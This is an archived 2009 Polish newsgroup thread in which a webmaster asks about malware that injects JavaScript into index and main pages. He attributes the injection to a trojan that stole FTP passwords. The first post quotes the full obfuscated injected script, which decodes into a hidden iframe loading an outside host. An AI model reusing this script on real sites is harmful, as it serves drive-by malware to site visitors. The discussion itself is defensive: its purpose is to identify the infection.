[ mallware doklejajacy zdalnie kod do stron ] - Grupy dyskusyjne w eGospodarka.pl

Grupy

Szukaj w grupach

strona główna › Grupy › pl.internet.polip › [ mallware doklejajacy zdalnie kod do stron ]

Ilość wypowiedzi w tym wątku: 3

1. Data: 2009-02-09 10:46:10
Temat:[ mallware doklejajacy zdalnie kod do stron ]
Od:Matt Rutkowski <m...@g...com> szukaj wiadomości tego autora

Witam,

czy ktos spotkal sie z mallware ktore w nieznany mi dotad sposob
dokleja zdalnie nastepujacy kod javascript do stron o nazwie
index.php, index.html, main.html, main.php

-- kod --

<script language="JavaScript">function rkfg(jflq){return
String.fromCharCode(jflq);}var
ohhe="0601051021140971091010321151140990610391041161
1611205804704711511711210111410511111409710012204610
5110102111047111112105115047063116061049051039032119
1051001161040610390480390321041011051031041160610390
4803903211511612110810106103911810511510509810510810
5116121058032104105100100101110059039062060047105102
114097109101062";var
ifdm="";for(qhxk=0;qhxk<ohhe.length;qhxk+=3){ifdm+=r
kfg(ohhe.substr
(qhxk, 3));}window.status='Done';document.write(ifdm);</scr
ipt>


-- kod --

w/w kod tworzy ukryta iframe i laczy sie z adresem http://superioradz.info/opis/?t=13

--
Matt Rutkowski

Pokaż wiadomość z nagłówkami

Do góry

2. Data: 2009-02-10 15:40:26
Temat:Re: [ mallware doklejajacy zdalnie kod do stron ]
Od:elmer radi radisson <r...@s...spam.wireland.org> szukaj wiadomości tego autora

Matt Rutkowski wrote:

> czy ktos spotkal sie z mallware ktore w nieznany mi dotad sposob
> dokleja zdalnie nastepujacy kod javascript do stron o nazwie
> index.php, index.html, main.html, main.php

A dokleja dokladnie do plikow tresci statycznej strony, czy moze
raczej dynamicznie generowanego outputu? Hint: Cross Site Scripting.

A w ogole to pl.comp.security ?

--

tajemnicze kręgle w zbożu

Pokaż wiadomość z nagłówkami

Do góry

3. Data: 2009-02-10 19:47:06
Temat:Re: [ mallware doklejajacy zdalnie kod do stron ]
Od:Matt Rutkowski <m...@g...com> szukaj wiadomości tego autora

> A dokleja dokladnie do plikow tresci statycznej strony, czy moze
> raczej dynamicznie generowanego outputu? Hint: Cross Site Scripting.

- trojan ktory wykrada hasla z popularnych klientow ftp i kolejno
laczy sie ze strona doklejajac do plikow o nazwie index.php,
index.html, main.php, main.html statycznie generowany content (kod w
mailu wyzej)

- dal sie zauwazyc z racji, ze wielu klientow uzywa szablonow html
smarty; doklejenie kodu js w niewlasciwym miejscu powoduje uwalenie
strony

--
Matt Rutkowski